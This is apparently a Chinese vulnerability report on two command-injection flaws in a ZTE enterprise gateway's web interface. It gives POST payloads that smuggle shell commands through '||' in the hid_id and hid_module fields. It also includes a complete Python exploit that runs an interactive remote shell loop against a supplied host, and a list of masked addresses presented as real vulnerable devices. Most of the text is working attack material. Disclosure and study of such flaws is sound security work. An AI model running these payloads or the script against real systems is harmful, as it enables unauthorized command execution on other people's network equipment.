中兴某企业网关系统存在两个命令执行漏洞
经测试发现,该设备还存在两处任意命令执行
/modules/service/voip_eone.be.php /modules/audit/audit_status.be.php
0x1 /modules/service/voip_eone.be.php
访问上述URL,然后post如下内容即可:
action=delete&hid_id=w||whoami>/usr/www/html/wy.txt||y
0x2 /modules/audit/audit_status.be.php
同样访问上述url,然后post数据:
action=start&hid_module=w||id>/usr/www/html/wy.txt||y
同样修改上个漏洞的exp,即可
#!/usr/bin/python import os import sys import requests import requests.packages.urllib3.util.ssl_ requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'ALL' host = sys.argv[1] #host = "**.**.**.**" if 'http' not in host: os._exit('error') def exp(cmd): path = "/modules/service/voip_eone.be.php" # action=delete&hid_id=w||whoami>/usr/www/html/xx.txt||y pars = { "action" : "delete", "hid_id" : "x||{}>/usr/www/html/.txt||x".format(cmd) } url = "{}{}".format(host,path) #print url #os._exit(0) try: req = requests.post(url, data=pars, verify=False) tmp = "{}/.txt".format(host) req = requests.get(tmp,verify=False) if req.status_code == 200: print req.content except: print 'url error' while True: cmd = raw_input('bash-$ ') if cmd == 'q': break exp(cmd)
随便选取几个案例,运行exp即可利用
python exp.py **.**.**.**/
python exp.py **.**.**.**/
其他一些案例:
**.**.**.**/ **.**.**.**/ **.**.**.**/ **.**.**.**/ **.**.**.**/ **.**.**.**/ **.**.**.**/ **.**.**.**/ **.**.**.**/ **.**.**.**/ **.**.**.**/ **.**.**.**/ **.**.**.**/ **.**.**.**/ **.**.**.**/ **.**.**.**/ **.**.**.**/
过滤